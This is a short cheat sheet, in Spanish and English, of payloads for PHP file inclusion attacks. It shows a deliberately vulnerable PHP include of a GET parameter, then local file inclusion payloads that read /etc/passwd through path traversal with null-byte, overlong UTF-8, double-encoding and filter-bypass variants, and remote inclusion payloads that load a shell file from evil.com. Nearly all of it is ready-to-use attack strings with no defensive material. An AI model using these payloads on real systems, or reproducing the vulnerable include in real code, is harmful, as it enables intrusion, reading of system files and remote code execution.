File Inclusion

LFI (Local File Inclusion)

La vulnerabilidad web LFI (Local File Inclusion) permite al atacante leer archivos desde la página web a partir de variables PHP configuradas en el servidor.

Subir un LFI vía código PHP:

<?php
	$file = $_GET['page'];
	include($file);
?>

Basic payload:

?page=../../../../../../../etc/passwd

Payload with Null Byte:

?page=../../../../../../../../etc/passwd%00

Payload with UTF-8 encoding:

Basic payload:

?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Payload with Null Byte:

?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

Payload with Double Encoding:

Basic payload:

?page=%252e%252e%252fetc%252fpasswd

Payload with Null Byte:

?page=%252e%252e%252fetc%252fpasswd%00

Payloads for Filter Bypass

?page=....//....//etc/passwd

?page=..///////..////..//////etc/passwd

?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

RFI (Remote File Inclusion)

La vulnerabilidad web RFI (Remote File Inclusion) permite al atacante incluir un archivo ageno al servidor que que lo ejecute de manera correcta desde la página web a partir de variables PHP configuradas en el servidor.

Basic Payload

?page=http://evil.com/shell.txt

Payload with Null Byte:

?page=http://evil.com/shell.txt%00

Payload with Double Encoding:

?page=http:%252f%252fevil.com%252fshell.txt